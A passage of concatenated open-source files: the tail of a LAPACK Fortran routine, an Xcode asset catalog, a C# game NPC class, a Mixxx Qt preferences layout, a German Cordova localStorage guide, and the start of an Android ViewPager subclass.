ELSE IF( M.LT.0 )THEN
INFO = 2
ELSE IF( N.LT.0 )THEN
INFO = 3
ELSE IF( KL.LT.0 .OR. KL.GT.M-1 ) THEN
INFO = 4
ELSE IF( KU.LT.0 .OR. KU.GT.N-1 ) THEN
INFO = 5
ELSE IF( LDAB.LT.KL+KU+1 )THEN
INFO = 6
ELSE IF( INCX.EQ.0 )THEN
INFO = 8
ELSE IF( INCY.EQ.0 )THEN
INFO = 11
END IF
IF( INFO.NE.0 )THEN
CALL XERBLA( 'ZLA_GBAMV ', INFO )
RETURN
END IF
*
* Quick return if possible.
*
IF( ( M.EQ.0 ).OR.( N.EQ.0 ).OR.
$ ( ( ALPHA.EQ.ZERO ).AND.( BETA.EQ.ONE ) ) )
$ RETURN
*
* Set LENX and LENY, the lengths of the vectors x and y, and set
* up the start points in X and Y.
*
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
LENX = N
LENY = M
ELSE
LENX = M
LENY = N
END IF
IF( INCX.GT.0 )THEN
KX = 1
ELSE
KX = 1 - ( LENX - 1 )*INCX
END IF
IF( INCY.GT.0 )THEN
KY = 1
ELSE
KY = 1 - ( LENY - 1 )*INCY
END IF
*
* Set SAFE1 essentially to be the underflow threshold times the
* number of additions in each row.
*
SAFE1 = DLAMCH( 'Safe minimum' )
SAFE1 = (N+1)*SAFE1
*
* Form y := alpha*abs(A)*abs(x) + beta*abs(y).
*
* The O(M*N) SYMB_ZERO tests could be replaced by O(N) queries to
* the inexact flag. Still doesn't help change the iteration order
* to per-column.
*
KD = KU + 1
KE = KL + 1
IY = KY
IF ( INCX.EQ.1 ) THEN
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KD+I-J, J ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( J ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( J ) )*TEMP
END DO
END IF
IF ( .NOT.SYMB_ZERO)
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
ELSE
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KE-I+J, I ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( J ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( J ) )*TEMP
END DO
END IF
IF ( .NOT.SYMB_ZERO)
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
END IF
ELSE
IF( TRANS.EQ.ILATRANS( 'N' ) )THEN
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
JX = KX
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KD+I-J, J ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( JX ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( JX ) )*TEMP
JX = JX + INCX
END DO
END IF
IF ( .NOT.SYMB_ZERO )
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
ELSE
DO I = 1, LENY
IF ( BETA .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
Y( IY ) = 0.0D+0
ELSE IF ( Y( IY ) .EQ. 0.0D+0 ) THEN
SYMB_ZERO = .TRUE.
ELSE
SYMB_ZERO = .FALSE.
Y( IY ) = BETA * ABS( Y( IY ) )
END IF
IF ( ALPHA .NE. 0.0D+0 ) THEN
JX = KX
DO J = MAX( I-KL, 1 ), MIN( I+KU, LENX )
TEMP = CABS1( AB( KE-I+J, I ) )
SYMB_ZERO = SYMB_ZERO .AND.
$ ( X( JX ) .EQ. ZERO .OR. TEMP .EQ. ZERO )
Y( IY ) = Y( IY ) + ALPHA*CABS1( X( JX ) )*TEMP
JX = JX + INCX
END DO
END IF
IF ( .NOT.SYMB_ZERO )
$ Y( IY ) = Y( IY ) + SIGN( SAFE1, Y( IY ) )
IY = IY + INCY
END DO
END IF
END IF
*
RETURN
*
* End of ZLA_GBAMV
*
END
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "universal",
"scale" : "1x",
"filename" : "api_arrow_white.png"
},
{
"idiom" : "universal",
"scale" : "2x",
"filename" : "[email protected]"
},
{
"idiom" : "universal",
"scale" : "3x",
"filename" : "[email protected]"
}
],
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
namespace Server.Mobiles
{
public class MageGuildmaster : BaseGuildmaster
{
public override bool ConvertsMageArmor => true;
[Constructable]
public MageGuildmaster()
: base("mage")
{
SetSkill(SkillName.EvalInt, 85.0, 100.0);
SetSkill(SkillName.Inscribe, 65.0, 88.0);
SetSkill(SkillName.MagicResist, 64.0, 100.0);
SetSkill(SkillName.Magery, 90.0, 100.0);
SetSkill(SkillName.Wrestling, 60.0, 83.0);
SetSkill(SkillName.Meditation, 85.0, 100.0);
SetSkill(SkillName.Macing, 36.0, 68.0);
}
public MageGuildmaster(Serial serial)
: base(serial)
{
}
public override NpcGuild NpcGuild => NpcGuild.MagesGuild;
public override VendorShoeType ShoeType => Utility.RandomBool() ? VendorShoeType.Shoes : VendorShoeType.Sandals;
public override void InitOutfit()
{
base.InitOutfit();
AddItem(new Items.Robe(Utility.RandomBlueHue()));
AddItem(new Items.GnarledStaff());
}
public override void Serialize(GenericWriter writer)
{
base.Serialize(writer);
writer.Write(0); // version
}
public override void Deserialize(GenericReader reader)
{
base.Deserialize(reader);
int version = reader.ReadInt();
}
}
} | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>DlgPrefDeckDlg</class>
<widget class="QWidget" name="DlgPrefDeckDlg">
<property name="geometry">
<rect>
<x>0</x>
<y>0</y>
<width>710</width>
<height>723</height>
</rect>
</property>
<property name="windowTitle">
<string>Deck Preferences</string>
</property>
<layout class="QGridLayout" name="gridLayout_3">
<item row="0" column="0">
<widget class="QGroupBox" name="groupBoxDeckOptions">
<property name="title">
<string>Deck options</string>
</property>
<layout class="QGridLayout" name="GridLayout1">
<property name="spacing">
<number>10</number>
</property>
<item row="5" column="0">
<widget class="QLabel" name="labelPlayingTrackProtection">
<property name="text">
<string>Playing track protection</string>
</property>
<property name="buddy">
<cstring>checkBoxDisallowLoadToPlayingDeck</cstring>
</property>
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="labelCueMode">
<property name="text">
<string>Cue mode</string>
</property>
<property name="openExternalLinks">
<bool>true</bool>
</property>
<property name="buddy">
<cstring>ComboBoxCueMode</cstring>
</property>
</widget>
</item>
<item row="4" column="1" colspan="2">
<widget class="QComboBox" name="comboBoxLoadPoint"/>
</item>
<item row="1" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxIntroStartMove">
<property name="toolTip">
<string>When the analyzer places the intro start point automatically,
it will place it at the main cue point if the main cue point has been set previously.
This may be helpful for upgrading to Mixxx 2.3 from earlier versions.
If this option is disabled, the intro start point is automatically placed at the first sound.</string>
</property>
<property name="text">
<string>Set intro start to main cue when analyzing tracks</string>
</property>
</widget>
</item>
<item row="1" column="0">
<widget class="QLabel" name="labelIntroStartMove">
<property name="text">
<string>Intro start</string>
</property>
<property name="buddy">
<cstring>ComboBoxCueMode</cstring>
</property>
</widget>
</item>
<item row="0" column="1" colspan="2">
<widget class="QComboBox" name="ComboBoxCueMode">
<property name="toolTip">
<string>Mixxx mode:
- Cue button while pause at cue point = preview
- Cue button while pause not at cue point = set cue point
- Cue button while playing = pause at cue point
Mixxx mode (no blinking):
- Same as Mixxx mode but with no blinking indicators
Pioneer mode:
- Same as Mixxx mode with a flashing play button
Denon mode:
- Cue button at cue point = preview
- Cue button not at cue point = pause at cue point
- Play = set cue point
Numark mode:
- Same as Denon mode, but without a flashing play button
CUP mode:
- Cue button while pause at cue point = play after release
- Cue button while pause not at cue point = set cue point and play after release
- Cue button while playing = go to cue point and play after release
</string>
</property>
</widget>
</item>
<item row="6" column="0">
<widget class="QLabel" name="labelCloneDeckOnLoadDoubleTap">
<property name="text">
<string>Clone deck</string>
</property>
<property name="buddy">
<cstring>checkBoxCloneDeckOnLoadDoubleTap</cstring>
</property>
</widget>
</item>
<item row="3" column="0">
<widget class="QLabel" name="labelTimeDisplay">
<property name="text">
<string>Time Format</string>
</property>
</widget>
</item>
<item row="3" column="1">
<widget class="QComboBox" name="comboBoxTimeFormat"/>
</item>
<item row="4" column="0">
<widget class="QLabel" name="labelLoadPoint">
<property name="text">
<string>Track load point</string>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="labelPositionDisplay">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="text">
<string>Track time display</string>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>radioButtonElapsed</cstring>
</property>
</widget>
</item>
<item row="5" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxDisallowLoadToPlayingDeck">
<property name="text">
<string>Do not load tracks into playing decks</string>
</property>
</widget>
</item>
<item row="2" column="1" colspan="2">
<layout class="QHBoxLayout" name="horizontalLayout">
<item>
<widget class="QRadioButton" name="radioButtonElapsed">
<property name="text">
<string>Elapsed</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
<item>
<widget class="QRadioButton" name="radioButtonRemaining">
<property name="text">
<string>Remaining</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
<item>
<widget class="QRadioButton" name="radioButtonElapsedAndRemaining">
<property name="text">
<string>Elapsed and Remaining</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupTrackTime</string>
</attribute>
</widget>
</item>
</layout>
</item>
<item row="6" column="1" colspan="2">
<widget class="QCheckBox" name="checkBoxCloneDeckOnLoadDoubleTap">
<property name="toolTip">
<string>Create a playing clone of the first playing deck by double-tapping a Load button on a controller or keyboard.
You can always drag-and-drop tracks on screen to clone a deck.</string>
</property>
<property name="text">
<string>Double-press Load button to clone playing track</string>
</property>
</widget>
</item>
</layout>
</widget>
</item>
<item row="1" column="0">
<widget class="QGroupBox" name="groupBoxSpeedPitchOptions">
<property name="title">
<string>Speed (Tempo) and Key (Pitch) options</string>
</property>
<layout class="QGridLayout" name="gridLayout_7">
<item row="0" column="0">
<layout class="QGridLayout" name="GridLayoutSpeedOptions">
<item row="7" column="1">
<widget class="QDoubleSpinBox" name="spinBoxPermanentRateCoarse">
<property name="toolTip">
<string>Permanent rate change when left-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>0.500000000000000</double>
</property>
</widget>
</item>
<item row="8" column="1">
<widget class="QDoubleSpinBox" name="spinBoxPermanentRateFine">
<property name="toolTip">
<string>Permanent rate change when right-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>0.050000000000000</double>
</property>
</widget>
</item>
<item row="1" column="0">
<widget class="QLabel" name="labelSpeedPitchReset">
<property name="text">
<string>Reset on track load</string>
</property>
<property name="buddy">
<cstring>checkBoxResetPitch</cstring>
</property>
</widget>
</item>
<item row="2" column="2">
<widget class="QRadioButton" name="radioButtonCurrentKey">
<property name="text">
<string>Current key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyLockMode</string>
</attribute>
</widget>
</item>
<item row="8" column="2">
<widget class="QDoubleSpinBox" name="spinBoxTemporaryRateFine">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Temporary rate change when right-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>1.000000000000000</double>
</property>
</widget>
</item>
<item row="6" column="1">
<widget class="QLabel" name="labelSpeedPermanent">
<property name="text">
<string>Permanent</string>
</property>
<property name="alignment">
<set>Qt::AlignCenter</set>
</property>
</widget>
</item>
<item row="5" column="1" colspan="2">
<layout class="QHBoxLayout" name="horizontalLayout_2">
<item>
<widget class="QSlider" name="SliderRateRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="minimum">
<number>100</number>
</property>
<property name="maximum">
<number>2500</number>
</property>
<property name="singleStep">
<number>50</number>
</property>
<property name="value">
<number>250</number>
</property>
<property name="orientation">
<enum>Qt::Horizontal</enum>
</property>
</widget>
</item>
<item>
<widget class="QSpinBox" name="SpinBoxRateRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Value in milliseconds</string>
</property>
<property name="minimum">
<number>100</number>
</property>
<property name="maximum">
<number>2500</number>
</property>
<property name="singleStep">
<number>1</number>
</property>
<property name="value">
<number>250</number>
</property>
</widget>
</item>
</layout>
</item>
<item row="6" column="2">
<widget class="QLabel" name="labelSpeedTemporary">
<property name="enabled">
<bool>false</bool>
</property>
<property name="text">
<string>Temporary</string>
</property>
<property name="alignment">
<set>Qt::AlignCenter</set>
</property>
</widget>
</item>
<item row="2" column="0">
<widget class="QLabel" name="labelKeylockMode">
<property name="text">
<string>Keylock mode</string>
</property>
<property name="buddy">
<cstring>radioButtonOriginalKey</cstring>
</property>
</widget>
</item>
<item row="5" column="0">
<widget class="QLabel" name="labelSpeedRampSensitivity">
<property name="enabled">
<bool>false</bool>
</property>
<property name="text">
<string>Ramping sensitivity</string>
</property>
<property name="buddy">
<cstring>SliderRateRampSensitivity</cstring>
</property>
</widget>
</item>
<item row="4" column="0">
<widget class="QLabel" name="labelSpeedBendBehavior">
<property name="text">
<string>Pitch bend behavior</string>
</property>
<property name="buddy">
<cstring>radioButtonRateRampModeStepping</cstring>
</property>
</widget>
</item>
<item row="2" column="1">
<widget class="QRadioButton" name="radioButtonOriginalKey">
<property name="text">
<string>Original key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyLockMode</string>
</attribute>
</widget>
</item>
<item row="7" column="2">
<widget class="QDoubleSpinBox" name="spinBoxTemporaryRateCoarse">
<property name="enabled">
<bool>false</bool>
</property>
<property name="toolTip">
<string>Temporary rate change when left-clicking</string>
</property>
<property name="accelerated">
<bool>true</bool>
</property>
<property name="suffix">
<string>%</string>
</property>
<property name="decimals">
<number>2</number>
</property>
<property name="minimum">
<double>0.010000000000000</double>
</property>
<property name="maximum">
<double>10.000000000000000</double>
</property>
<property name="singleStep">
<double>0.010000000000000</double>
</property>
<property name="value">
<double>4.000000000000000</double>
</property>
</widget>
</item>
<item row="1" column="2">
<widget class="QCheckBox" name="checkBoxResetSpeed">
<property name="text">
<string>Speed/Tempo</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedPitchReset</string>
</attribute>
</widget>
</item>
<item row="1" column="1">
<widget class="QCheckBox" name="checkBoxResetPitch">
<property name="text">
<string>Key/Pitch</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedPitchReset</string>
</attribute>
</widget>
</item>
<item row="6" column="0">
<widget class="QLabel" name="labelSpeedAdjustment">
<property name="text">
<string>Adjustment buttons:</string>
</property>
</widget>
</item>
<item row="7" column="0">
<widget class="QLabel" name="labelSpeedCoarse">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="toolTip">
<string/>
</property>
<property name="text">
<string>Coarse</string>
</property>
<property name="alignment">
<set>Qt::AlignRight|Qt::AlignTrailing|Qt::AlignVCenter</set>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>spinBoxPermanentRateCoarse</cstring>
</property>
</widget>
</item>
<item row="8" column="0">
<widget class="QLabel" name="labelSpeedFine">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="toolTip">
<string/>
</property>
<property name="text">
<string>Fine</string>
</property>
<property name="alignment">
<set>Qt::AlignRight|Qt::AlignTrailing|Qt::AlignVCenter</set>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>spinBoxPermanentRateFine</cstring>
</property>
</widget>
</item>
<item row="0" column="2">
<widget class="QCheckBox" name="checkBoxInvertSpeedSlider">
<property name="toolTip">
<string>Make the speed sliders work like those on DJ turntables and CDJs where moving downward increases the speed</string>
</property>
<property name="text">
<string>Down increases speed</string>
</property>
</widget>
</item>
<item row="0" column="0">
<widget class="QLabel" name="labelSpeedSliderrange">
<property name="enabled">
<bool>true</bool>
</property>
<property name="font">
<font/>
</property>
<property name="text">
<string>Slider range</string>
</property>
<property name="wordWrap">
<bool>false</bool>
</property>
<property name="buddy">
<cstring>ComboBoxRateRange</cstring>
</property>
</widget>
</item>
<item row="0" column="1">
<widget class="QComboBox" name="ComboBoxRateRange">
<property name="font">
<font/>
</property>
<property name="toolTip">
<string>Adjusts the range of the speed (Vinyl "Pitch") slider.</string>
</property>
</widget>
</item>
<item row="4" column="2">
<widget class="QRadioButton" name="radioButtonRateRampModeStepping">
<property name="text">
<string>Abrupt jump</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedBendBehavior</string>
</attribute>
</widget>
</item>
<item row="4" column="1">
<widget class="QRadioButton" name="radioButtonRateRampModeLinear">
<property name="toolTip">
<string>Smoothly adjusts deck speed when temporary change buttons are held down</string>
</property>
<property name="text">
<string>Smooth ramping</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupSpeedBendBehavior</string>
</attribute>
</widget>
</item>
<item row="3" column="0">
<widget class="QLabel" name="labelKeyunlockMode">
<property name="text">
<string>Keyunlock mode</string>
</property>
</widget>
</item>
<item row="3" column="1">
<widget class="QRadioButton" name="radioButtonResetUnlockedKey">
<property name="text">
<string>Reset key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyUnlockMode</string>
</attribute>
</widget>
</item>
<item row="3" column="2">
<widget class="QRadioButton" name="radioButtonKeepUnlockedKey">
<property name="text">
<string>Keep key</string>
</property>
<attribute name="buttonGroup">
<string notr="true">buttonGroupKeyUnlockMode</string>
</attribute>
</widget>
</item>
</layout>
</item>
</layout>
</widget>
</item>
<item row="2" column="0">
<spacer name="verticalSpacer">
<property name="orientation">
<enum>Qt::Vertical</enum>
</property>
<property name="sizeHint" stdset="0">
<size>
<width>20</width>
<height>40</height>
</size>
</property>
</spacer>
</item>
</layout>
</widget>
<layoutdefault spacing="6" margin="11"/>
<tabstops>
<tabstop>ComboBoxCueMode</tabstop>
<tabstop>radioButtonElapsed</tabstop>
<tabstop>radioButtonRemaining</tabstop>
<tabstop>radioButtonElapsedAndRemaining</tabstop>
<tabstop>checkBoxDisallowLoadToPlayingDeck</tabstop>
<tabstop>ComboBoxRateRange</tabstop>
<tabstop>checkBoxInvertSpeedSlider</tabstop>
<tabstop>checkBoxResetPitch</tabstop>
<tabstop>checkBoxResetSpeed</tabstop>
<tabstop>radioButtonOriginalKey</tabstop>
<tabstop>radioButtonCurrentKey</tabstop>
<tabstop>radioButtonResetUnlockedKey</tabstop>
<tabstop>radioButtonKeepUnlockedKey</tabstop>
<tabstop>radioButtonRateRampModeLinear</tabstop>
<tabstop>radioButtonRateRampModeStepping</tabstop>
<tabstop>SliderRateRampSensitivity</tabstop>
<tabstop>SpinBoxRateRampSensitivity</tabstop>
<tabstop>spinBoxPermanentRateCoarse</tabstop>
<tabstop>spinBoxPermanentRateFine</tabstop>
<tabstop>spinBoxTemporaryRateCoarse</tabstop>
<tabstop>spinBoxTemporaryRateFine</tabstop>
</tabstops>
<resources/>
<connections>
<connection>
<sender>SliderRateRampSensitivity</sender>
<signal>valueChanged(int)</signal>
<receiver>SpinBoxRateRampSensitivity</receiver>
<slot>setValue(int)</slot>
<hints>
<hint type="sourcelabel">
<x>372</x>
<y>442</y>
</hint>
<hint type="destinationlabel">
<x>437</x>
<y>445</y>
</hint>
</hints>
</connection>
<connection>
<sender>SpinBoxRateRampSensitivity</sender>
<signal>valueChanged(int)</signal>
<receiver>SliderRateRampSensitivity</receiver>
<slot>setValue(int)</slot>
<hints>
<hint type="sourcelabel">
<x>437</x>
<y>445</y>
</hint>
<hint type="destinationlabel">
<x>372</x>
<y>442</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>labelSpeedRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>117</x>
<y>446</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>SliderRateRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>372</x>
<y>442</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeLinear</sender>
<signal>toggled(bool)</signal>
<receiver>SpinBoxRateRampSensitivity</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>438</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>437</x>
<y>445</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>labelSpeedTemporary</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>467</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>spinBoxTemporaryRateCoarse</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>493</y>
</hint>
</hints>
</connection>
<connection>
<sender>radioButtonRateRampModeStepping</sender>
<signal>toggled(bool)</signal>
<receiver>spinBoxTemporaryRateFine</receiver>
<slot>setEnabled(bool)</slot>
<hints>
<hint type="sourcelabel">
<x>263</x>
<y>417</y>
</hint>
<hint type="destinationlabel">
<x>438</x>
<y>521</y>
</hint>
</hints>
</connection>
</connections>
<buttongroups>
<buttongroup name="buttonGroupTrackTime"/>
<buttongroup name="buttonGroupKeyUnlockMode"/>
<buttongroup name="buttonGroupKeyLockMode"/>
<buttongroup name="buttonGroupSpeedBendBehavior"/>
<buttongroup name="buttonGroupSpeedPitchReset">
<property name="exclusive">
<bool>false</bool>
</property>
</buttongroup>
</buttongroups>
</ui>
| {
"pile_set_name": "Github"
} |
---
license: >
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
title: localStorage
---
# localStorage
Ermöglicht den Zugriff auf die W3C [Web-Speicherschnittstelle][1]
[1]: http://dev.w3.org/html5/webstorage/#the-localstorage-attribute
var permanentStorage = window.localStorage;
var tempStorage = window.sessionStorage;
## Methoden
* **Schlüssel**: gibt den Namen des Schlüssels an der angegebenen Position zurück.
* **GetItem**: gibt das Element mit dem angegebenen Schlüssel identifiziert.
* **SetItem**: weist eine freigestellte Element Wert.
* **RemoveItem**: entfernt das Element mit dem angegebenen Schlüssel identifiziert.
* **Löschen**: entfernt alle Schlüssel/Wert-Paare.
## Informationen
Die `window.localStorage` -Schnittstelle implementiert die W3C [Web-Speicherschnittstelle][2]. Eine app kann damit um persistente Daten mithilfe von Schlüssel-Wert-Paaren zu speichern. Die `window.sessionStorage` Schnittstelle funktioniert genauso in jeder Hinsicht, es sei denn, dass alle Daten jedes Mal die app schließt deaktiviert ist. Jede [Datenbank](../database/database.html) bietet einen separaten Namespace.
[2]: http://dev.w3.org/html5/webstorage/
## Unterstützte Plattformen
* Android
* BlackBerry WebWorks (OS 6.0 und höher)
* iOS
* Tizen
* Windows Phone 7 und 8
## Schnelle Schlüsselbeispiel
var keyName = window.localStorage.key(0);
## Set Item Beispiel
window.localStorage.setItem("key", "value");
## Element kurzes Beispiel zu erhalten
var value = window.localStorage.getItem("key");
// value is now equal to "value"
## Kleines Beispiel Element entfernen
window.localStorage.removeItem("key");
## Kleines Beispiel zu löschen
window.localStorage.clear();
## Vollständiges Beispiel
<!DOCTYPE html>
<html>
<head>
<title>Storage Example</title>
<script type="text/javascript" charset="utf-8" src="cordova.js"></script>
<script type="text/javascript" charset="utf-8">
// Wait for device API libraries to load
//
document.addEventListener("deviceready", onDeviceReady, false);
// device APIs are available
//
function onDeviceReady() {
window.localStorage.setItem("key", "value");
var keyname = window.localStorage.key(i);
// keyname is now equal to "key"
var value = window.localStorage.getItem("key");
// value is now equal to "value"
window.localStorage.removeItem("key");
window.localStorage.setItem("key2", "value2");
window.localStorage.clear();
// localStorage is now empty
}
</script>
</head>
<body>
<h1>Example</h1>
<p>localStorage</p>
</body>
</html>
## Windows Phone 7 Macken
Punktnotation ist *nicht* für Windows Phone 7 verfügbar. Verwenden Sie `setItem` oder `getItem` , anstatt auf Tasten direkt aus dem Speicherobjekt, wie z.B.`window.localStorage.someKey`. | {
"pile_set_name": "Github"
} |
package com.ttdevs.android.transformers;
import android.content.Context;
import android.graphics.Point;
import androidx.viewpager.widget.ViewPager;
import android.util.AttributeSet;
import android.view.View;
public class MultiViewPager extends ViewPager {
/**
* Maximum size.
*/
private int mMaxWidth = -1;
/**
* Maximum size.
*/
private int mMaxHeight = -1;
/**
* Child view inside a page to match the page size against.
*/
private int mMatchWidthChildResId;
/**
* Internal state to schedule a new measurement pass.
*/
private boolean mNeedsMeasurePage;
private static void constrainTo(Point size, Point maxSize) {
if (maxSize.x >= 0) {
if (size.x > maxSize.x) {
size.x = maxSize.x;
}
}
if (maxSize.y >= 0) {
if (size.y > maxSize.y) {
size.y = maxSize.y;
}
}
}
public MultiViewPager(Context context) {
super(context);
}
public MultiViewPager(Context context, AttributeSet attrs) {
super(context, attrs);
init(context, attrs);
}
private void init(Context context, AttributeSet attrs) {
setClipChildren(false);
// TypedArray ta = context.obtainStyledAttributes(attrs, R.styleable.MultiViewPager);
// setMaxWidth(ta.getDimensionPixelSize(R.styleable.MultiViewPager_android_maxWidth, -1));
// setMaxHeight(ta.getDimensionPixelSize(R.styleable.MultiViewPager_android_maxHeight, -1));
// setMatchChildWidth(ta.getResourceId(R.styleable.MultiViewPager_matchChildWidth, 0));
// ta.recycle();
}
@Override
protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
Point size = new Point(
MeasureSpec.getSize(widthMeasureSpec),
MeasureSpec.getSize(heightMeasureSpec));
if (mMaxWidth >= 0 || mMaxHeight >= 0) {
Point maxSize = new Point(mMaxWidth, mMaxHeight);
constrainTo(size, maxSize);
widthMeasureSpec = MeasureSpec.makeMeasureSpec(
size.x,
MeasureSpec.EXACTLY);
heightMeasureSpec = MeasureSpec.makeMeasureSpec(
size.y,
MeasureSpec.EXACTLY);
}
super.onMeasure(widthMeasureSpec, heightMeasureSpec);
onMeasurePage(widthMeasureSpec, heightMeasureSpec);
}
protected void onMeasurePage(int widthMeasureSpec, int heightMeasureSpec) {
// Only measure if a measurement pass was scheduled
if (!mNeedsMeasurePage) {
return;
}
if (mMatchWidthChildResId == 0) {
mNeedsMeasurePage = false;
} else if (getChildCount() > 0) {
View child = getChildAt(0);
child.measure(widthMeasureSpec, heightMeasureSpec);
